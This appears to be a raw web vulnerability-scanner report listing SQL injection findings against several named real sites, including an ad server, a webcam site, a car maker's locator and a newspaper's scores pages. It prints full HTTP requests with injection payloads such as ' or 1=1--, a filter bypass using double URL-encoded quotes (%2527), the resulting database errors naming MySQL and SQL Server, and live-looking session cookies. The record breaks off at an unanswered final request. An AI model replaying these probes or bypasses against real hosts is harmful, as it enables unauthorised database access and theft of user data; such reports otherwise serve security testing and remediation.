GET /static/rtb/sync-min.html32712709'%20or%201%3d1--%20/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 333 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Fri, 28 Jan 2011 16:44:24 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html32712709' or 1=1-- / was not ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html>
Request 2
GET /static/rtb/sync-min.html32712709'%20or%201%3d2--%20/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 242 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Fri, 28 Jan 2011 16:44:24 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static/rtb/sync-min.html32712709' or 1=2-- / was not ...[SNIP]... </p> </body></html>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:07 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: icafr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQQQDTD=NAMDOIMAEMHFENAMDMFANDKA; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:07 GMT Connection: close Content-Length: 8336 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess'/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:08 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess''/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSTRTBSD=DEBIMIMACEBMBLPLGCGPGBPD; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:08 GMT Connection: close Content-Length: 8237 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:23 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:22 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSRTQCRC=BGLJMIMACIIMCJCMFKACJEGI; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:22 GMT Connection: close Content-Length: 8230 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The gotopage parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gotopage parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/' HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:23 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/'' HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2 (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:24 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQQRCSC=CMMFJIMAHFOLCAODNFPHKCBL; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:23 GMT Connection: close Content-Length: 8249 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /waccess%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:17:34 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess%2527%2527/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:34 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: igr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQRQRCTC=ABOPGJMANIICBDDCLAFKMEHJ; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:35 GMT Connection: close Content-Length: 8333 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /getuid HTTP/1.1 Host: ib.adnxs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;
Response 1
HTTP/1.1 500 No url Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly Date: Fri, 28 Jan 2011 16:46:47 GMT Content-Length: 0 Connection: close
Request 2
GET /getuid HTTP/1.1 Host: ib.adnxs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;
Response 2
HTTP/1.1 302 Moved Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:47 GMT; domain=.adnxs.com; HttpOnly Location: ...C Date: Fri, 28 Jan 2011 16:46:47 GMT Content-Length: 0 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:25:08 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQSRBSD=MDONOIMAHFCJJOAEABNJMFBH; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:08 GMT Connection: close Content-Length: 8441 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload " was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /zip.aspx HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dcc=39942763.226884546; s_fv=flash%2010; __utmz=1.1296235644.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/46"; s_sq=%5B%5BB%5D%5D; visitStart=1; dcp=zmm.50658498.; s_cc=true; camp=zmm.50658498.39942763.226884546; PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; s_vi=[CS]v1|26A17E3905013448-600001130013AF6C[CE]; __utma=1.72358646.1296235644.1296235644.1296235644.1; __utmc=1; __utmb=1.3.10.1296235644;
Response
HTTP/1.1 200 OK Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.3.2 Content-Type: text/html; charset=UTF-8 Expires: Sat, 29 Jan 2011 04:53:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 29 Jan 2011 04:53:06 GMT Content-Length: 5852 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... </div> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '27' AND a.version = 'en' AND ac.category_page='ZPA' AND' at line 5
The regionalZipCode parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the regionalZipCode parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the regionalZipCode request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The vehicle parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the vehicle parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback'&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.3.2 Content-Type: text/html; charset=UTF-8 Expires: Fri, 28 Jan 2011 16:59:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 28 Jan 2011 16:59:39 GMT Content-Length: 5818 Connection: close Set-Cookie: PHPSESSID=2gc1h1bken3hk7rrjdn9g0c2e2; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]... </div> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '27' AND a.version = 'en' AND ac.category_page='ZPA' AND' at line 5
Request 2
GET /zip.aspx?regionalZipCode=null&vehicle=versa-hatchback''&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1 Host: local.nissanusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.15 (Fedora) X-Powered-By: PHP/5.3.2 Content-Type: text/html; charset=UTF-8 Expires: Fri, 28 Jan 2011 16:59:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 28 Jan 2011 16:59:39 GMT Content-Length: 15976 Connection: close Set-Cookie: PHPSESSID=s9eoga6caogtb5dnhcsqkqej14; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /waccess'/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Server Error Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv32 Date: Fri, 28 Jan 2011 14:25:27 GMT Connection: close Content-Length: 63 Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/
<html><body><h1> HTTP/1.1 New Session Failed</h1></body></html>
Request 2
GET /waccess''/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSQRTQDQC=DLPLFJMAFKGAEJJBLHMDPHAI; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:28 GMT Connection: close Content-Length: 8441 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The team parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the team parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /aspdata/clients/herald/game.aspx?team=028' HTTP/1.1 Host: scores.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sat, 29 Jan 2011 01:55:09 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8703
<html> <head> <title>Unclosed quotation mark before the character string '028''.<br>Line 1: Incorrect syntax near '028''.</title> <style> body {font-family:"Verdana";f ...[SNIP]...
The team parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the team parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /aspdata/clients/herald/nbagame.aspx?team=092' HTTP/1.1 Host: scores.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Sat, 29 Jan 2011 01:55:02 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8732
<html> <head> <title>Unclosed quotation mark before the character string '092',1'.<br>Line 1: Incorrect syntax near '092',1'.</title> <style> body {font-family:"Verdan ...[SNIP]...
Request 2
GET /aspdata/clients/herald/nbagame.aspx?team=092'' HTTP/1.1 Host: scores.heraldinteractive.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
